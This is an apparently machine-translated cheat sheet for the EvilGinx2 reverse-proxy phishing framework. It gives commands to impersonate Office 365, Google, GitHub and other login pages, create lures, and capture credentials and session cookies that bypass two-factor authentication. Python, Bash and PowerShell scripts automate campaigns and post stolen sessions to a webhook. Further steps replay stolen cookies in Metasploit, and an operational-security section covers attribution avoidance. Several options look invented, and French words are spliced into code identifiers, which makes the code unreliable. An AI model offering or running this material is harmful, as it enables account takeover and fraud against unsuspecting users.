EvilGinx2 hameçonnage Framework aide-mémoire
Overview
EvilGinx2 is a man-in-the-middle attack framework designed for advanced hameçonnage campaigns. It acts as a reverse proxy between the cible website and the victim, allowing attackers to capture identifiants, session cookies, and bypass two-factor authentification (2FA). EvilGinx2 is particularly effective against modern authentification mechanisms and provides real-time hameçonnage capabilities.
⚠️ Warning: This tool is intended for authorized tests de pénétration and équipe rouge exercises only. Ensure you have proper autorisation before using against any cible.
Installation
Prerequisites
# Install Go 1.19+ and Git
sudo apt update
sudo apt install -y golang-go git
# Verify Go Installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
Installation from GitHub
# Clone EvilGinx2 repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Build EvilGinx2
make
# Install to system path
sudo make install
# Or run directly
./bin/evilginx
Docker Installation
# Clone repository
git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
# Build Docker image
docker build -t evilginx2 .
# Run EvilGinx2 container
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp evilginx2
# Run with persistent data
docker run -it --rm -p 443:443 -p 80:80 -p 53:53/udp -v $(pwd)/data:/app/data evilginx2
Manual Installation
# Download latest release
wget https://github.com/kgretzky/evilginx2/releases/latest/download/evilginx-linux-amd64.tar.gz
# Extract and install
tar -xzf evilginx-linux-amd64.tar.gz
sudo mv evilginx /usr/local/bin/
sudo chmod +x /usr/local/bin/evilginx
Basic configuration
Initial Setup
# Start EvilGinx2
sudo evilginx
# Set domain for hameçonnage
config domain evil.com
# Set external IP address
config ip 192.168.1.100
# Enable developer mode (for testing)
config dev true
# Set redirect URL for successful hameçonnage
config redirect_url https://www.google.com
SSL certificat configuration
# Generate Let's Encrypt certificats (requires valid domain)
config domain hameçonnage.exemple.com
config ip 1.2.3.4
certs
# Use custom certificats
config cert_path /path/to/cert.pem
config clé_path /path/to/clé.pem
# Self-signed certificats (for testing)
config self_sign true
DNS configuration
# Configure DNS settings
config dns 8.8.8.8
# Enable DNS server
config dns_enabled true
# Set DNS port
config dns_port 53
# Add custom DNS records
dns A hameçonnage.exemple.com 192.168.1.100
dns A login.hameçonnage.exemple.com 192.168.1.100
Phishlets Management
Built-in Phishlets
# List available phishlets
phishlets
# Show phishlet details
phishlets show [phishlet_name]
# Enable phishlet
phishlets enable [phishlet_name]
# Disable phishlet
phishlets disable [phishlet_name]
# Get phishlet hôtename
phishlets hôtename [phishlet_name] [hôtename]
Popular Phishlets
# Microsoft Office 365
phishlets enable o365
phishlets hôtename o365 login.microsoftonline.evil.com
# Google
phishlets enable google
phishlets hôtename google accounts.google.evil.com
# GitHub
phishlets enable github
phishlets hôtename github github.evil.com
# LinkedIn
phishlets enable linkedin
phishlets hôtename linkedin www.linkedin.evil.com
# Amazon
phishlets enable amazon
phishlets hôtename amazon signin.aws.amazon.evil.com
Custom Phishlet Creation
# exemple phishlet configuration (custom.yaml)
name: 'custom'
author: '@attacker'
min_ver: '2.3.0'
proxy_hôtes:
- \\\\{phish_sub: 'login', orig_sub: 'login', domain: 'cible.com', session: true, is_landing: true\\\\}
sub_filters:
- \\\\{triggers_on: 'login.cible.com', orig_sub: 'login', domain: 'cible.com', search: 'cible.com', replace: 'login.cible.evil.com', mimes: ['text/html', 'application/json']\\\\}
auth_jetons:
- domain: '.cible.com'
clés: ['session_jeton', 'auth_cookie']
auth_urls:
- '/login'
- '/authenticate'
identifiants:
nom d'utilisateur:
clé: 'nom d'utilisateur'
search: '(.*)'
type: 'post'
mot de passe:
clé: 'mot de passe'
search: '(.*)'
type: 'post'
login:
domain: 'cible.com'
path: '/login'
Loading Custom Phishlets
# Copy phishlet to phishlets directory
cp custom.yaml ~/.evilginx/phishlets/
# Reload phishlets
phishlets
# Enable custom phishlet
phishlets enable custom
phishlets hôtename custom login.cible.evil.com
Lures and Campaign Management
Creating Lures
# Create new lure
lures create [phishlet_name]
# List all lures
lures
# Get lure details
lures get-url [lure_id]
# Delete lure
lures delete [lure_id]
# Edit lure
lures edit [lure_id] redirect_url https://legitimate-site.com
Lure configuration options
# Set redirect URL
lures edit [lure_id] redirect_url https://www.google.com
# Set user agent filter
lures edit [lure_id] ua_filter "Mozilla/5.0*"
# Set IP filter
lures edit [lure_id] ip_filter "192.168.1.0/24"
# Set custom paramètres
lures edit [lure_id] params "utm_source=email&utm;_campaign=test"
# Enable/disable lure
lures edit [lure_id] enabled true
lures edit [lure_id] enabled false
Advanced Lure Features
# Set custom landing page
lures edit [lure_id] landing_path "/custom-login"
# Set session timeout
lures edit [lure_id] session_timeout 3600
# Set maximum visits
lures edit [lure_id] max_visits 100
# Set geographic restrictions
lures edit [lure_id] geo_filter "US,CA,GB"
# Set time-based restrictions
lures edit [lure_id] time_filter "09:00-17:00"
session Management
Viewing sessions
# List all captured sessions
sessions
# Show session details
sessions [session_id]
# Export session data
sessions export [session_id] /path/to/export.json
# Delete session
sessions delete [session_id]
# Clear all sessions
sessions clear
session Data Analysis
# View captured identifiants
sessions [session_id] creds
# View captured cookies
sessions [session_id] cookies
# View session timeline
sessions [session_id] timeline
# Export cookies for browser import
sessions [session_id] export-cookies /path/to/cookies.txt
Real-time session Monitoring
# Enable real-time notifications
config notifications true
# Set notification webhook
config webhook_url https://your-server.com/webhook
# Monitor sessions in real-time
tail -f ~/.evilginx/logs/evilginx.log
# Custom monitoring script
watch -n 5 'evilginx -c "sessions"|tail -10'
Advanced Features
Traffic Manipulation
# Custom JavaScript injection
config js_inject true
config js_file /path/to/custom.js
# Custom CSS injection
config css_inject true
config css_file /path/to/custom.css
# Content replacement rules
config replace_rules /path/to/rules.json
# Header manipulation
config custom_headers /path/to/headers.json
Evasion Techniques
# Enable anti-detection features
config anti_detect true
# Randomize response timing
config timing_random true
# Enable CAPTCHA bypass
config captcha_bypass true
# Custom error pages
config error_pages /path/to/error_pages/
# Geofencing
config geo_block "CN,RU,KP"
# User-Agent filtering
config ua_block "bot,crawler,scanner"
Integration Features
# Webhook notifications
config webhook_enabled true
config webhook_url https://your-server.com/notifications
config webhook_secret your_secret_clé
# Slack integration
config slack_webhook https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK
# Email notifications
config smtp_server smtp.gmail.com:587
config smtp_nom d'utilisateur your_email@gmail.com
config smtp_mot de passe your_app_mot de passe
config notification_email admin@your-domain.com
Automation and Scripting
Python Automation Script
#!/usr/bin/env python3
# EvilGinx2 automation script
import subprocessus
import json
import time
import requests
from datetime import datetime
class EvilGinxAutomation:
def __init__(self, domain, ip_address):
self.domain = domain
self.ip_address = ip_address
self.webhook_url = None
def setup_evilginx(self):
"""Initial EvilGinx2 setup"""
commandes = [
f"config domain \\\\{self.domain\\\\}",
f"config ip \\\\{self.ip_address\\\\}",
"config dev false",
"config redirect_url https://www.google.com",
"certs"
]
for cmd in commandes:
self.execute_commande(cmd)
time.sleep(2)
def execute_commande(self, commande):
"""Execute EvilGinx2 commande"""
try:
result = subprocessus.run([
"evilginx", "-c", commande
], capture_output=True, text=True, timeout=30)
return result.stdout
except subprocessus.TimeoutExpired:
return "commande timed out"
except Exception as e:
return f"Error: \\\\{str(e)\\\\}"
def setup_phishlet(self, phishlet_name, hôtename):
"""Setup and enable phishlet"""
commandes = [
f"phishlets enable \\\\{phishlet_name\\\\}",
f"phishlets hôtename \\\\{phishlet_name\\\\} \\\\{hôtename\\\\}"
]
for cmd in commandes:
print(f"[+] Executing: \\\\{cmd\\\\}")
result = self.execute_commande(cmd)
time.sleep(1)
return True
def create_lure(self, phishlet_name, redirect_url=None):
"""Create hameçonnage lure"""
cmd = f"lures create \\\\{phishlet_name\\\\}"
result = self.execute_commande(cmd)
# Extract lure ID from result
lure_id = self.extract_lure_id(result)
if redirect_url and lure_id:
self.execute_commande(f"lures edit \\\\{lure_id\\\\} redirect_url \\\\{redirect_url\\\\}")
return lure_id
def extract_lure_id(self, output):
"""Extract lure ID from commande output"""
# Parse output to extract lure ID
# Implementation depends on EvilGinx2 output format
lines = output.split('\n')
for line in lines:
if 'lure' in line.lower() and 'id' in line.lower():
# Extract ID using regex or string parsing
import re
match = re.search(r'id:\s*(\d+)', line)
if match:
return match.group(1)
return None
def get_lure_url(self, lure_id):
"""Get hameçonnage URL for lure"""
result = self.execute_commande(f"lures get-url \\\\{lure_id\\\\}")
# Parse URL from result
lines = result.split('\n')
for line in lines:
if 'http' in line:
return line.strip()
return None
def monitor_sessions(self):
"""Monitor captured sessions"""
while True:
result = self.execute_commande("sessions")
sessions = self.parse_sessions(result)
for session in sessions:
if session.get('new', False):
self.handle_new_session(session)
time.sleep(10)
def parse_sessions(self, output):
"""Parse sessions from commande output"""
# Implementation depends on EvilGinx2 output format
sessions = []
lines = output.split('\n')
for line in lines:
if 'session' in line.lower():
# Parse session data
session_data = \\\\{
'id': 'extracted_id',
'timestamp': datetime.now(),
'new': True # Logic to determine if session is new
\\\\}
sessions.append(session_data)
return sessions
def handle_new_session(self, session):
"""Handle new captured session"""
print(f"[+] New session captured: \\\\{session['id']\\\\}")
# Get session details
session_details = self.execute_commande(f"sessions \\\\{session['id']\\\\}")
# Send notification
if self.webhook_url:
self.send_webhook_notification(session, session_details)
# Export session data
self.export_session(session['id'])
def send_webhook_notification(self, session, details):
"""Send webhook notification for new session"""
charge utile = \\\\{
'session_id': session['id'],
'timestamp': session['timestamp'].isoformat(),
'details': details
\\\\}
try:
response = requests.post(self.webhook_url, json=charge utile, timeout=10)
if response.status_code == 200:
print("[+] Webhook notification sent")
else:
print(f"[-] Webhook failed: \\\\{response.status_code\\\\}")
except Exception as e:
print(f"[-] Webhook error: \\\\{str(e)\\\\}")
def export_session(self, session_id):
"""Export session data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
export_path = f"/tmp/session_\\\\{session_id\\\\}_\\\\{timestamp\\\\}.json"
self.execute_commande(f"sessions export \\\\{session_id\\\\} \\\\{export_path\\\\}")
print(f"[+] session exported to: \\\\{export_path\\\\}")
def setup_campaign(self, campaign_config):
"""Setup complete hameçonnage campaign"""
print("[+] Setting up EvilGinx2 campaign...")
# Initial setup
self.setup_evilginx()
# Setup phishlets
for phishlet in campaign_config.get('phishlets', []):
self.setup_phishlet(phishlet['name'], phishlet['hôtename'])
# Create lures
for lure_config in phishlet.get('lures', []):
lure_id = self.create_lure(phishlet['name'], lure_config.get('redirect_url'))
if lure_id:
lure_url = self.get_lure_url(lure_id)
print(f"[+] Lure created: \\\\{lure_url\\\\}")
print("[+] Campaign setup complete")
# utilisation exemple
def main():
# Campaign configuration
campaign_config = \\\\{
'phishlets': [
\\\\{
'name': 'o365',
'hôtename': 'login.microsoftonline.evil.com',
'lures': [
\\\\{'redirect_url': 'https://office.com'\\\\},
\\\\{'redirect_url': 'https://outlook.com'\\\\}
]
\\\\},
\\\\{
'name': 'google',
'hôtename': 'accounts.google.evil.com',
'lures': [
\\\\{'redirect_url': 'https://gmail.com'\\\\}
]
\\\\}
]
\\\\}
# Initialize automation
automation = EvilGinxAutomation("evil.com", "192.168.1.100")
automation.webhook_url = "https://your-server.com/webhook"
# Setup campaign
automation.setup_campaign(campaign_config)
# Start monitoring
automation.monitor_sessions()
if __name__ == "__main__":
main()
Bash Automation Script
#!/bin/bash
# EvilGinx2 bash automation script
DOMAIN="evil.com"
IP_ADDRESS="192.168.1.100"
PHISHLET="o365"
hôteNAME="login.microsoftonline.evil.com"
# Function to execute EvilGinx2 commandes
execute_evilginx_commande() \\\\{
local commande="$1"
echo "[+] Executing: $commande"
evilginx -c "$commande"
sleep 2
\\\\}
# Initial setup
echo "[+] Setting up EvilGinx2..."
execute_evilginx_commande "config domain $DOMAIN"
execute_evilginx_commande "config ip $IP_ADDRESS"
execute_evilginx_commande "config dev false"
execute_evilginx_commande "config redirect_url https://www.google.com"
execute_evilginx_commande "certs"
# Setup phishlet
echo "[+] Setting up phishlet: $PHISHLET"
execute_evilginx_commande "phishlets enable $PHISHLET"
execute_evilginx_commande "phishlets hôtename $PHISHLET $hôteNAME"
# Create lure
echo "[+] Creating lure..."
LURE_OUTPUT=$(evilginx -c "lures create $PHISHLET")
LURE_ID=$(echo "$LURE_OUTPUT"|grep -oP 'id:\s*\K\d+')
if [ -n "$LURE_ID" ]; then
echo "[+] Lure created with ID: $LURE_ID"
# Configure lure
execute_evilginx_commande "lures edit $LURE_ID redirect_url https://office.com"
# Get lure URL
LURE_URL=$(evilginx -c "lures get-url $LURE_ID"|grep -oP 'https?://[^\s]+')
echo "[+] hameçonnage URL: $LURE_URL"
else
echo "[-] Failed to create lure"
exit 1
fi
# Monitor sessions
echo "[+] Starting session monitoring..."
while true; do
sessionS=$(evilginx -c "sessions"|grep -c "session")
if [ "$sessionS" -gt 0 ]; then
echo "[+] $sessionS session(s) captured"
# Export latest session
| LATEST_session=$(evilginx -c "sessions" | tail -1 | awk '\\\\{print $1\\\\}') |
if [ -n "$LATEST_session" ]; then
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
evilginx -c "sessions export $LATEST_session /tmp/session_$\\\\{LATEST_session\\\\}_$\\\\{TIMESTAMP\\\\}.json"
echo "[+] session exported: /tmp/session_$\\\\{LATEST_session\\\\}_$\\\\{TIMESTAMP\\\\}.json"
fi
fi
sleep 30
done
PowerShell Automation
# EvilGinx2 PowerShell automation script
function Invoke-EvilGinxAutomation \\\\{
param(
[string]$Domain = "evil.com",
[string]$IPAddress = "192.168.1.100",
[string]$Phishlet = "o365",
[string]$hôtename = "login.microsoftonline.evil.com"
)
function Execute-EvilGinxcommande \\\\{
param([string]$commande)
Write-hôte "[+] Executing: $commande"
try \\\\{
$result = & evilginx -c $commande 2>&1
Start-Sleep -Seconds 2
return $result
\\\\}
catch \\\\{
Write-Warning "Failed to execute commande: $commande"
return $null
\\\\}
\\\\}
# Initial setup
Write-hôte "[+] Setting up EvilGinx2..."
Execute-EvilGinxcommande "config domain $Domain"
Execute-EvilGinxcommande "config ip $IPAddress"
Execute-EvilGinxcommande "config dev false"
Execute-EvilGinxcommande "config redirect_url https://www.google.com"
Execute-EvilGinxcommande "certs"
# Setup phishlet
Write-hôte "[+] Setting up phishlet: $Phishlet"
Execute-EvilGinxcommande "phishlets enable $Phishlet"
Execute-EvilGinxcommande "phishlets hôtename $Phishlet $hôtename"
# Create lure
Write-hôte "[+] Creating lure..."
$lureOutput = Execute-EvilGinxcommande "lures create $Phishlet"
if ($lureOutput -match 'id:\s*(\d+)') \\\\{
$lureId = $matches[1]
Write-hôte "[+] Lure created with ID: $lureId"
# Configure lure
Execute-EvilGinxcommande "lures edit $lureId redirect_url https://office.com"
# Get lure URL
$lureUrlOutput = Execute-EvilGinxcommande "lures get-url $lureId"
if ($lureUrlOutput -match '(https?://[^\s]+)') \\\\{
$lureUrl = $matches[1]
Write-hôte "[+] hameçonnage URL: $lureUrl"
\\\\}
\\\\}
else \\\\{
Write-Error "Failed to create lure"
return
\\\\}
# Monitor sessions
Write-hôte "[+] Starting session monitoring..."
while ($true) \\\\{
$sessionsOutput = Execute-EvilGinxcommande "sessions"
$sessionCount = ($sessionsOutput|Select-String "session").Count
if ($sessionCount -gt 0) \\\\{
Write-hôte "[+] $sessionCount session(s) captured"
# Export latest session
$sessions = $sessionsOutput -split "`n"|Where-Object \\{ $_ -match "session" \\}
if ($sessions.Count -gt 0) \\{
$latestsession = ($sessions[-1] -split '\s+')[0]
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$exportPath = "/tmp/session_$\\{latestsession\\}_$\\{timestamp\\}.json"
Execute-EvilGinxcommande "sessions export $latestsession $exportPath"
Write-hôte "[+] session exported: $exportPath"
\\}
\\}
Start-Sleep -Seconds 30
\\}
\\}
# Execute automation
Invoke-EvilGinxAutomation -Domain "evil.com" -IPAddress "192.168.1.100"
Integration with Other Tools
Metasploit Integration
# Use EvilGinx2 for credential harvesting, pivot to Metasploit
# After capturing identifiants, use them in Metasploit modules
# exemple: Use captured O365 identifiants
use auxiliary/scanner/http/office365_login
set nom d'utilisateur captured_nom d'utilisateur@company.com
set mot de passe captured_mot de passe
set RhôteS company-mail.outlook.com
run
# Use captured session cookies in browser automation
use auxiliary/scanner/http/cookie_replay
set COOKIE "captured_session_cookie"
set RhôteS cible.com
run
ingénierie sociale Toolkit Integration
# Combine with SET for comprehensive campaigns
# Use EvilGinx2 for credential harvesting
# Use SET for charge utile delivery
# Generate SET charge utile
setoolkit
# Select Social-Engineering Attacks
# Select Website Attack Vectors
# Select Credential Harvester Attack Method
# Use custom EvilGinx2 URL as redirect
GoPhish Integration
# Use GoPhish for email delivery
# Use EvilGinx2 for credential harvesting
# GoPhish campaign configuration
\\{
"name": "O365 Campaign",
"template": \\{
"name": "O365 Login Required",
"subject": "Action Required: Verify Your Account",
"html": "<a href='\\{\\{.URL\\}\\}'>Click here to verify</a>"
\\},
"url": "https://login.microsoftonline.evil.com/lure_url"
\\}
Operational Security
Domain and Infrastructure
# Use legitimate-looking domains
# Register domains with privacy protection
# Use cloud hôteing providers
# Implement CDN for traffic distribution
# exemple domain registration
# Register: microsoftonline-security.com
# Setup: login.microsoftonline-security.com
# SSL: Let's Encrypt or commercial certificat
Traffic Obfuscation
# Enable anti-detection features
config anti_detect true
# Use legitimate SSL certificats
config cert_path /path/to/legitimate/cert.pem
# Implement geographic restrictions
config geo_block "high_risk_countries"
# Use realistic timing delays
config timing_random true
config min_delay 500
config max_delay 2000
Log Management
# Configure secure logging
config log_file /var/log/evilginx/access.log
config log_level info
# Implement log rotation
logrotate /etc/logrotate.d/evilginx
# Secure log storage
# Encrypt logs at rest
# Use remote log aggregation
# Implement log retention policies
Attribution Prevention
# Use VPS with cryptocurrency payment
# Implement proxy chains
# Use Tor for administrative access
# Regularly rotate infrastructure
# exemple infrastructure rotation
# Week 1: VPS Provider A, Domain Set 1
# Week 2: VPS Provider B, Domain Set 2
# Week 3: VPS Provider C, Domain Set 3
dépannage
Common Issues
# certificat issues
# Check domain DNS configuration
# Verify Let's Encrypt rate limits
# Test certificat validity
# DNS resolution problems
# Check DNS server configuration
# Verify domain propagation
# Test with different DNS resolvers
# Phishlet not working
# Check phishlet syntaxe
# Verify cible website changes
# Test with different browsers
Debug Mode
# Enable debug logging
config debug true
config log_level debug
# Test phishlet functionality
phishlets test [phishlet_name]
# Check network connectivity
curl -I https://your-hameçonnage-domain.com
# Verify SSL configuration
openssl s_client -connect your-domain.com:443
Performance Optimization
# Optimize for high traffic
config max_connexions 1000
config timeout 30
# Enable caching
config cache_enabled true
config cache_size 100MB
# Monitor resource utilisation
htop
iotop
netstat -tulpn
Best Practices
Campaign Planning
- cible research: Understand cible organization and users
- Domain selection: Choose convincing domain names
- Infrastructure setup: Use secure and anonymous hôteing
- Testing: Thoroughly test hameçonnage pages before deployment
- Monitoring: Implement real-time session monitoring
Legal and Ethical Considerations
# Authorized testing only
# Obtain proper written autorisation
# Follow responsible disclosure
# Protect captured data
# Document all activities
# exemple autorisation checklist
# [ ] Written tests de pénétration agreement
# [ ] Scope clearly defined
# [ ] Data handling procedures established
# [ ] réponse aux incidents plan in place
# [ ] Legal review completed
Data Protection
# Encrypt captured data
# Implement secure data storage
# Use secure communication channels
# Regular data purging
# Contrôle d'Accès and auditing
# exemple data chiffrement
gpg --cipher-algo AES256 --compress-algo 1 --symmetric --output session_data.gpg session_data.json
Resources
- EvilGinx2 GitHub Repository
- EvilGinx2 documentation
- Phishlet Development Guide
- OWASP hameçonnage Guide
- Anti-hameçonnage Working Group
This aide-mémoire provides a comprehensive reference for using EvilGinx2 hameçonnage framework. Always ensure you have proper autorisation before conducting hameçonnage simulations or tests de pénétration.